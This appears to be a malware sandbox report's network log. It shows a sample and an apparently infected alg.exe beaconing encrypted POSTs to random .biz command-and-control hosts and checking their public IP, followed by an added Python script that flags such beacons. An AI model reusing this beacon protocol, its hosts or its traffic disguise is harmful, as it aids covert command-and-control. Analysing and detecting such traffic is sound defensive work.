Nov 5, 2024 17:04:36.292485952 CET | 358 | OUT | POST /snxddmvolovsghk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:36.292485952 CET | 778 | OUT | Data Raw: 78 e3 ab aa 52 5c 67 3f fe 02 00 00 82 6d 8f 0e ba 84 68 9e e3 0c e8 68 7e 16 b0 83 63 3d 2c 43 6a 43 00 7b c3 9b a6 6c f7 46 0b 5c f0 cf b6 e5 78 e2 0f 2c 17 05 7a 77 74 9c f0 eb f3 f4 2a 7d 21 08 b2 e9 dd 4b ad e6 4e 1a 99 1b 0f e4 67 f0 75 62
Data Ascii: xR\g?mhh~c=,CjC{lF\x,zwt*}!KNgubG$c78Zz1YVvRbf#R g<QfM#IZx.zlv.D^93Pi@k(v96g(ZHB%
Nov 5, 2024 17:04:36.946475983 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f523d4e2ff7952a8ae7b9ce21e512de8|173.254.250.76|1730822676|1730822676|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 140
Source IP: 192.168.2.5    Source Port: 59815    Destination IP: 18.208.156.248    Destination Port: 80    PID: 1816    Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:37.401132107 CET | 360 | OUT | POST /glquerlqdouqshy HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: damcprvgv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:37.401181936 CET | 828 | OUT | Data Raw: 9a 48 b8 ea fe 35 e9 b5 30 03 00 00 06 2a 86 b4 10 8b 15 b4 08 51 aa c1 d5 3c a6 a6 1b 3a a0 24 3c 1b 42 b6 29 d5 56 4a 57 7c b9 e6 ee 75 60 ad e3 21 0b db c1 d2 4f d2 85 fa 46 6d 64 46 9a dc a4 47 87 ec 0a eb 36 63 b1 ac b5 2d e8 80 94 b1 e8 e9
    Data Ascii: H50*Q<:$<B)VJW|u`!OFmdFG6c-&ActX"~i&2|6joYhNnD(MP/zwF` =Vub$^(P7!exozk)QE%u4cb ev++;\'~+Vaec3|
Nov 5, 2024 17:04:38.062328100 CET | 417 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a189e3f31bdeb0ac82541e7bc6791b29|173.254.250.76|1730822677|1730822677|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 141
Source IP: 192.168.2.5    Source Port: 59816    Destination IP: 34.211.97.45    Destination Port: 80    PID: 1492    Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:37.718473911 CET | 346 | OUT | POST /vnho HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: bghjpy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:04:37.718527079 CET | 778 | OUT | Data Raw: e4 57 24 ba b5 82 10 f0 fe 02 00 00 48 a1 e2 55 fd 5f 8e 52 fd 7b 65 2e 71 6a 1e 93 ef 2b 62 4c 1e a2 43 ee f3 01 f4 a0 c7 60 14 0a 4b 62 0f bf 1a 48 42 fd f6 23 62 45 5e bf 6d fc 33 1f d2 03 85 d5 d4 67 58 03 79 1f af ba f9 28 2c 17 f1 30 0f 4d
    Data Ascii: W$HU_R{e.qj+bLC`KbHB#bE^m3gXy(,0Mioi/+".~*,$uHIBJ{xt[?,.';@=DR+M]Gxo7-EP)8S<;aLyAm3]lFlh
Nov 5, 2024 17:04:38.540276051 CET | 414 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=c415c52a22a7b5b67c8944959f9122e6|173.254.250.76|1730822678|1730822678|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 142
Source IP: 192.168.2.5    Source Port: 59817    Destination IP: 3.254.94.185    Destination Port: 80    PID: 1816    Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:38.105509996 CET | 345 | OUT | POST /ow HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ocsvqjg.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:38.105577946 CET | 828 | OUT | Data Raw: 2b 63 94 22 06 e0 2f 5c 30 03 00 00 92 c9 8f a1 d4 9c 8e ad 44 c1 fa df 7e 60 14 0c 59 27 6e 50 ea b9 80 17 f3 d5 be 8f aa 71 36 f1 4f de 58 de 13 20 6c 40 72 97 34 d4 72 d5 8a 07 78 d9 8c 19 99 c7 42 8f 01 ae 10 cb fc 12 32 28 f9 36 d7 55 70 1f
    Data Ascii: +c"/\0D~`Y'nPq6OX l@r4rxB2(6UpL[kfjZk>&}E'_\[Kk(^pRzf:r~D|v]. {VP[;_zd7Y-G8D,}np[-{ ~@x
Nov 5, 2024 17:04:39.070704937 CET | 415 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=74b94d0340b26f3c5cd991536953c446|173.254.250.76|1730822678|1730822678|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
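Sessions 140 through 142 share one shape: an HTTP POST from microsofts.exe or the infected alg.exe to a short random-label .biz host, a fixed Chrome 39 / WindowsWechat / QQBrowser User-Agent, no Content-Type, a binary body, and an nginx 200 with an empty chunked body plus btst/snkz cookies. Two details in the captured data are worth checking by hand: the btst cookie's second field is the sandbox's egress address 173.254.250.76 and its third and fourth fields are Unix timestamps that equal the response Date header (1730822677 is 16:04:37 GMT on 5 Nov 2024), and in all three request bodies bytes 8 through 11 read little-endian equal Content-Length minus 12 (0x330 = 816 = 828 - 12; 0x2fe = 766 = 778 - 12). The script below is an added example written for this editorial pass, not part of the Joe Sandbox report and not the malware's own protocol definition. It encodes those checks as triage logic over records transcribed from the session blocks above plus one constructed benign control; the cookie field meanings, the 12-byte length-prefixed header, and the 4-of-5 indicator threshold are inferences from these three sessions, not documented protocol.

```python
"""Triage checks over the HTTP beacon sessions captured in this report (added example)."""
import re
import struct
from email.utils import parsedate_to_datetime

# User-Agent sent by every beacon in the report: a fixed, years-old Chrome 39 /
# WindowsWechat / QQBrowser string, not the browser actually installed on the host.
OBSERVED_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
    "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)

# Records transcribed from sessions 140-142 above (first 12 body bytes only);
# constructed test data for this example, not a live capture.
SAMPLE_SESSIONS = [
    {"id": 140, "pid": 1816, "dst": "18.208.156.248", "host": "damcprvgv.biz",
     "uri": "/glquerlqdouqshy", "user_agent": OBSERVED_UA, "content_type": None,
     "content_length": 828, "body_prefix": bytes.fromhex("9a48b8eafe35e9b530030000"),
     "date": "Tue, 05 Nov 2024 16:04:37 GMT", "response_body": b"0\r\n\r\n",
     "btst": "a189e3f31bdeb0ac82541e7bc6791b29|173.254.250.76|1730822677|1730822677|0|1|0"},
    {"id": 141, "pid": 1492, "dst": "34.211.97.45", "host": "bghjpy.biz",
     "uri": "/vnho", "user_agent": OBSERVED_UA, "content_type": None,
     "content_length": 778, "body_prefix": bytes.fromhex("e45724bab58210f0fe020000"),
     "date": "Tue, 05 Nov 2024 16:04:38 GMT", "response_body": b"0\r\n\r\n",
     "btst": "c415c52a22a7b5b67c8944959f9122e6|173.254.250.76|1730822678|1730822678|0|1|0"},
    {"id": 142, "pid": 1816, "dst": "3.254.94.185", "host": "ocsvqjg.biz",
     "uri": "/ow", "user_agent": OBSERVED_UA, "content_type": None,
     "content_length": 828, "body_prefix": bytes.fromhex("2b63942206e02f5c30030000"),
     "date": "Tue, 05 Nov 2024 16:04:38 GMT", "response_body": b"0\r\n\r\n",
     "btst": "74b94d0340b26f3c5cd991536953c446|173.254.250.76|1730822678|1730822678|0|1|0"},
]

# Constructed benign control (hypothetical host and UA) to show the checks stay quiet.
BENIGN_SESSION = {
    "id": 900, "pid": 4242, "dst": "203.0.113.10", "host": "update.example.com",
    "uri": "/api/check", "content_type": "application/json",
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/130.0.0.0 Safari/537.36",
    "content_length": 19, "body_prefix": b'{"version":"1.2.3"}',
    "date": "Tue, 05 Nov 2024 16:05:00 GMT", "response_body": b'{"ok":true}',
}

# Short all-lowercase label under .biz, as seen in every beacon host here (heuristic).
DGA_LIKE = re.compile(r"^[a-z]{4,16}\.biz$")


def parse_btst(cookie: str) -> dict:
    """Split the btst cookie. Field meaning is inferred from this report: field 1 is
    the client's egress IP as the server saw it, fields 2 and 3 are Unix timestamps."""
    parts = cookie.split("|")
    return {"tag": parts[0], "ip": parts[1],
            "first_seen": int(parts[2]), "last_seen": int(parts[3]), "extra": parts[4:]}


def declared_body_length(body_prefix: bytes) -> int:
    """Read bytes 8..11 of the request body as a little-endian uint32. In all three
    captured sessions this equals Content-Length - 12, so the example treats the
    first 12 bytes as a header carrying the payload length (an inference)."""
    if len(body_prefix) < 12:
        raise ValueError("need at least the 12-byte header")
    return struct.unpack_from("<I", body_prefix, 8)[0]


def cookie_matches_date(session: dict) -> bool:
    """True when both cookie timestamps equal the server's Date header."""
    date_epoch = int(parsedate_to_datetime(session["date"]).timestamp())
    c = parse_btst(session["btst"])
    return c["first_seen"] == date_epoch == c["last_seen"]


def beacon_indicators(session: dict) -> list:
    """Return the names of the beacon traits this session exhibits."""
    hits = []
    if session["user_agent"] == OBSERVED_UA:
        hits.append("fixed_spoofed_user_agent")
    if session["content_type"] is None and session["content_length"] > 0:
        hits.append("post_without_content_type")
    if DGA_LIKE.match(session["host"]):
        hits.append("random_label_biz_host")
    if session["response_body"] == b"0\r\n\r\n":
        hits.append("empty_chunked_response")
    if declared_body_length(session["body_prefix"]) == session["content_length"] - 12:
        hits.append("length_prefixed_binary_body")
    return hits


def triage(sessions: list, threshold: int = 4) -> list:
    """Sessions with at least `threshold` indicators, with the egress IP the C2 echoed back."""
    out = []
    for s in sessions:
        hits = beacon_indicators(s)
        if len(hits) >= threshold:
            egress = parse_btst(s["btst"])["ip"] if "btst" in s else None
            out.append({"id": s["id"], "pid": s["pid"], "host": s["host"],
                        "indicators": hits, "egress_ip": egress})
    return out


if __name__ == "__main__":
    for hit in triage(SAMPLE_SESSIONS + [BENIGN_SESSION]):
        print(hit)
```

The length-prefix check is the one that survives a C2 rotating its domains and User-Agent, so in a real proxy log feed it is the indicator to weight highest; the Date-versus-cookie comparison is mainly useful for confirming that the three sessions hit the same backend, since all of them echoed the same egress address and in-sync timestamps.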


Session ID: 143
Source IP: 192.168.2.5    Source Port: 59820    Destination IP: 18.208.156.248    Destination Port: 80    PID: 1492    Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:38.823153019 CET | 360 | OUT | POST /hbbreaeoihjkosw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: damcprvgv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.823175907 CET778OUTData Raw: 55 2d a8 a0 33 f4 6e 3e fe 02 00 00 c8 9e 3c 17 dd ec 16 3b ad f8 f6 b3 2f 28 5b db 49 8f 1c e5 13 2c f1 b1 fe b0 54 53 a0 3c 4e 8e a0 19 4d e2 95 74 a1 5d 76 c7 b8 9c 24 30 93 e8 92 28 76 d5 2e 59 7b e6 1d 09 10 8a d4 4f ae d5 4a 97 28 0e 47 37
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: U-3n><;/([I,TS<NMt]v$0(v.Y{OJ(G7)VYE[Vn#rjGWf2[]5cpq'mHN{Ls\)UIm%n2B00y!('Y~~`@K=$=jk_m6+a6O7Wt1g@d=3m
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.490765095 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=170b1049700e172231c5e3f610d79481|173.254.250.76|1730822679|1730822679|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.5 | 59821 | 54.244.188.177 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:39.102952003 CET | 345 | OUT | POST /kaok HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: ywffr.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 828
Nov 5, 2024 17:04:39.103009939 CET | 828 | OUT | Data Raw: b3 35 b0 ac 1f 85 43 a7 30 03 00 00 49 e6 db d7 4b 5b de 30 39 1e fe d1 12 56 92 68 bd db 24 b4 5f e8 76 ff 15 b2 76 45 7c 48 96 8d 7d 02 b1 24 ea 05 d1 7d 6d d2 89 ec 46 79 03 74 2e 63 f6 8b bf 9f cb ec 07 9f 2d 6b cc 1b 41 49 16 ff 1b ff 7b 09
  Data Ascii: 5C0IK[09Vh$_vvE|H}$}mFyt.c-kAI{t4$}spgAQ;<ewiRO0gIc*mn"}uZkQgw< v*oUj+-]'<06:4GFa
Nov 5, 2024 17:04:39.934623003 CET | 413 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 05 Nov 2024 16:04:39 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=968a67c2a094ade1998c79b272e4b098|173.254.250.76|1730822679|1730822679|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.5 | 59822 | 54.244.188.177 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:40.156209946 CET | 353 | OUT | POST /gcbuytwgypg HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: ecxbwt.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 828
Nov 5, 2024 17:04:40.159065008 CET | 828 | OUT | Data Raw: 3a 19 6a da cf d1 1a 83 30 03 00 00 4d 66 d6 95 23 ed b8 2c 66 e8 42 b7 99 7d 4b 8e 21 b3 6a ab 9e bd 82 f1 71 19 3c 7b c3 27 88 22 a6 70 41 2e ab 4f 02 20 22 19 c2 4a 5d 64 84 56 4d 50 39 44 ae 83 34 13 dd 5b 74 96 5b 1f 67 74 11 8e 98 5b f6 59
  Data Ascii: :j0Mf#,fB}K!jq<{'"pA.O "J]dVMP9D4[t[gt[Y>)l{k)ef:tHtPAF'JLFHrCk9LbfZ33vb>X|zOO7u8GRVucg1`Z!vNV#0P/PV52vY
Nov 5, 2024 17:04:40.989425898 CET | 414 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 05 Nov 2024 16:04:40 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=19f38410194ec0b0736287dccea597a3|173.254.250.76|1730822680|1730822680|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.5 | 59823 | 3.254.94.185 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:40.448261976 CET | 345 | OUT | POST /cm HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: ocsvqjg.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 5, 2024 17:04:40.448261976 CET | 778 | OUT | Data Raw: 27 ff 21 2e 5a cb cc 38 fe 02 00 00 0e 09 54 8f a1 d2 fe c4 36 3a 98 df b2 07 42 83 d0 d9 3f 31 2f a4 a6 1b 29 3d cc 7c f4 58 d3 77 08 70 f8 6f a7 76 b5 d2 cf 3e e9 2c 45 6d 5b de 90 74 60 58 34 bb 00 04 2f 67 48 af da 6a ef df 4c 5c 60 c8 8a 66
  Data Ascii: '!.Z8T6:B?1/)=|Xwpov>,Em[t`X4/gHjL\`fT$;L3UY<3CSuSd/9II_8A/kfdz"3R|'%d oj#]/Qry#9dm8[HQxE08d5FMjoldlhZUSf$#u
Nov 5, 2024 17:04:41.376957893 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=316f53102cdc4d3dea258c81b6d21cf8|173.254.250.76|1730822681|1730822681|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
147        | 192.168.2.5 | 59824       | 18.246.231.120 | 80               | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:41.022072077 CET | 355 | OUT | POST /iuaudncacnnpxx HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pectx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:41.022097111 CET | 828 | OUT | Data Raw: 67 53 15 f5 d0 f9 bf 5b 30 03 00 00 36 ff f8 56 06 07 4e 48 b1 d3 c1 b3 17 1a e7 0a 7d 2b d5 14 d2 05 7a 21 08 6e 0f 85 64 97 b0 f8 4c d7 1b 62 66 fd a1 12 0a e5 04 00 29 13 eb 2b c8 33 e1 18 e7 d0 8b ac d0 6a cc a4 8b 42 5a d4 89 8d d9 a4 69 61
    Data Ascii: gS[06VNH}+z!ndLbf)+3jBZia?;o6cK.DPVUR;q.Fe<S#Rg8PtG4|IPW~<LJ}a$PO;"P!Gm{0Wnymh]ix{pcBp
Nov 5, 2024 17:04:41.863279104 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:41 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=308e7dfd6f81f3f38a0cd20fd06a81cb|173.254.250.76|1730822681|1730822681|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
148        | 192.168.2.5 | 59826       | 54.244.188.177 | 80               | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:41.785294056 CET | 351 | OUT | POST /biwgwfhxqj HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ywffr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:04:41.785413980 CET | 778 | OUT | Data Raw: c8 52 1f 69 ac f0 aa db fe 02 00 00 c7 4e c5 37 2f a8 36 ec e2 e0 1c 38 84 cb 65 0f d0 8f c9 87 f7 a6 d0 72 15 f5 9c e6 18 c2 e4 38 76 ae b3 18 a2 b4 6e 65 60 ff 39 f6 a8 7a 6c d2 46 f6 19 e6 6c 48 c8 26 93 1f 55 7c 87 b5 95 cc 7e 89 d8 d2 1d 07
    Data Ascii: RiN7/68er8vne`9zlFlH&U|~d[dkRl>$^.l.^~1C=;B5<oY?!fWg>OwUF~ABaaEcFU"l6t=KWw+F
Nov 5, 2024 17:04:42.626332045 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=3aa263268d136981ad4fe6eec3d46f0b|173.254.250.76|1730822682|1730822682|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
149        | 192.168.2.5 | 61993       | 18.208.156.248 | 80               | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:42.522381067 CET | 352 | OUT | POST /dgclnsuj HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: zyiexezl.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:42.522428989 CET | 828 | OUT | Data Raw: 65 2f 23 80 2b 94 0e b0 30 03 00 00 46 92 35 3d c8 59 d8 5a c8 09 3c 8e 78 78 53 18 6a 59 b6 99 6a 3c 14 5a 4e db ec ef af 43 de 23 6b ac da 86 e1 ab b3 5c cf 08 ff e8 9a 96 b2 79 06 54 89 da 97 94 86 04 c7 13 3d 9c 85 8e ba 11 68 3f e3 10 20 c7
    Data Ascii: e/#+0F5=YZ<xxSjYj<ZNC#k\yT=h? 0kfD\4v{aX$%`s82U1'_7OJ`C$K[L)m2E<pbB7+zfw?vi/o|&WK2}LBh
Nov 5, 2024 17:04:43.183725119 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:43 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b1838f91566a73df58e489d9510b4511|173.254.250.76|1730822683|1730822683|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 172.67.74.152 | 443 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-05 16:02:51 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-05 16:02:52 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Tue, 05 Nov 2024 16:02:52 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8dde1212f98f6c38-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1782&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=1618781&cwnd=252&unsent_bytes=0&cid=18a3b16331b93128&ts=353&x=0"
